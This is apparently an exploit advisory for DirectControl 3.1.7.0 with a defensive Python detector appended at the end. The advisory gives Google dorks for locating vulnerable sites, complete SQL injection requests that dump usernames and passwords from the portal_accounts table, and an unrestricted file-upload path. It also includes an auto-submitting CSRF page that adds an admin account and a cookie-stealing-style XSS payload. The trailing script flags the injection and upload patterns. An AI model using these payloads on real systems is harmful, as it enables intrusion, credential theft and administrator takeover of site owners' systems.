DirectControlTM Version 3.1.7.0 - Multiple Vulnerabilities
====================================================================
####################################################################
.:. Author  : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home    : http://www.iphobos.com/blog/
.:. Script  : www.directclarity.com
.:. Dork    : [1] intext:"DirectClarity, LLC All Rights Reserved."
              [2] inurl:"/cm/password_retrieve.asp?redir_id=1"
####################################################################
################################

[1] SQL Injection
===================

Type: POST string, MSSQL injection (error-based; the injected expression is cast to int so the server returns it in a 500 error page)

Extract the database version:
-------------------------

POST /cm/password_retrieve.asp HTTP/1.1
Host: www.server.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site/cm/password_retrieve.asp
Cookie: __utma=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

redir_id=1&uname=' and+1=cast(@@version as int)-- -&email_password=Email+My+Password

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Cache-Control: private
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date:
Content-Length: 352

Request template, where |command| is the injected expression:

redir_id=1&uname=|command|&email_password=Email+My+Password

Extract username & password:
----------------------------

Information: table name: portal_accounts; columns: username, password

POST /cm/password_retrieve.asp HTTP/1.1
Host: www.server.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site/cm/password_retrieve.asp
Cookie: __utma=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

redir_id=1&uname=' and+1=cast((Select TOP 1 username from portal_accounts) as int) -- -&email_password=Email+My+Password

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Cache-Control: private
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date:
Content-Length: 352

Username:
redir_id=1&uname=' and+1=cast((Select TOP 1 username from portal_accounts) as int) -- -&email_password=Email+My+Password

Password:
redir_id=1&uname=' and+1=cast((Select TOP 1 password from portal_accounts) as int) -- -&email_password=Email+My+Password

[2] Arbitrary File Upload
==========================

http://site/cm/fileManage/default.asp?action=UploadFiles&path=/cm/media/images

Your file is then served from: http://site/cm/media/images

[3] CSRF [Add Admin]
=====================

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/cm/admin.asp">
<input type="hidden" name="fname" value="...."/>
<input type="hidden" name="lname" value="...."/>
<input type="hidden" name="uname" value="admin"/>
<input type="hidden" name="pword" value="123456"/>
<input type="hidden" name="telco" value="...."/>
<input type="hidden" name="email" value="...."/>
<input type="hidden" name="ustat" value="0"/>
<input type="hidden" name="SecGroupDropDown" value="1"/>
<input type="hidden" name="AddButton" value="ADD THIS USER"/>
<input type="hidden" name="pageView" value="User Administration"/>
<input type="hidden" name="pageAction" value="Add System User"/>
<input type="hidden" name="whatDo" value="AddUserAction"/>
</form>
</body>
</html>

[4] Cross Site Scripting
=========================

Go to: http://site/cm/admin.asp?pageView=General Configuration&pageAction=RSS Management

Add a new channel, enter the following as the new channel name, and submit:

<script>alert(document.cookie);</script>

####################################################################
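The following is an added detection example, not part of the advisory: it flags requests to the password-retrieve endpoint carrying the error-based cast() pattern shown above, and requests to the file manager's UploadFiles action. The request records, field names and record format are constructed assumptions, not the product's own logging format.

```python
"""Flag requests matching the DirectControl advisory's SQLi and upload patterns.

The sample requests below are constructed for this example; a real deployment
would feed it parsed web-server or reverse-proxy request logs.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Error-based MSSQL pattern from the advisory: break out of the string with a
# quote, then 1=cast(<expr> as int) so the server leaks <expr> in a 500 page.
CAST_RE = re.compile(r"cast\s*\(.+?\s+as\s+int\s*\)", re.IGNORECASE | re.DOTALL)
COMMENT_RE = re.compile(r"--|/\*")


def flag_request(method: str, url: str, body: str = "") -> list:
    """Return finding labels for one request (empty list means clean)."""
    findings = []
    parts = urlsplit(url)
    path = parts.path.lower()
    # Merge query-string and form-body parameters; parse_qs URL-decodes them.
    params = parse_qs(parts.query, keep_blank_values=True)
    if method.upper() == "POST" and body:
        for name, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(name, []).extend(values)

    if path.endswith("/cm/password_retrieve.asp"):
        for name, values in params.items():
            for value in values:
                if "'" in value and CAST_RE.search(value):
                    findings.append("sqli-cast:" + name)
                elif "'" in value and COMMENT_RE.search(value):
                    findings.append("sqli-comment:" + name)
    if path.endswith("/cm/filemanage/default.asp") and \
            params.get("action", [""])[0].lower() == "uploadfiles":
        findings.append("filemanager-upload")
    return findings


# Constructed samples: one benign request, one with the advisory's @@version
# payload (URL-encoded as a browser would send it), one hitting the uploader.
SAMPLES = [
    ("POST", "/cm/password_retrieve.asp",
     "redir_id=1&uname=jdoe&email_password=Email+My+Password"),
    ("POST", "/cm/password_retrieve.asp",
     "redir_id=1&uname='+and+1%3Dcast(@@version+as+int)--+-&email_password=Email+My+Password"),
    ("GET", "/cm/fileManage/default.asp?action=UploadFiles&path=/cm/media/images", ""),
]


def scan(samples=SAMPLES):
    """Run flag_request over each (method, url, body) record."""
    return [flag_request(*record) for record in samples]


if __name__ == "__main__":
    for record, result in zip(SAMPLES, scan()):
        print(record[0], record[1], "->", result or "clean")
```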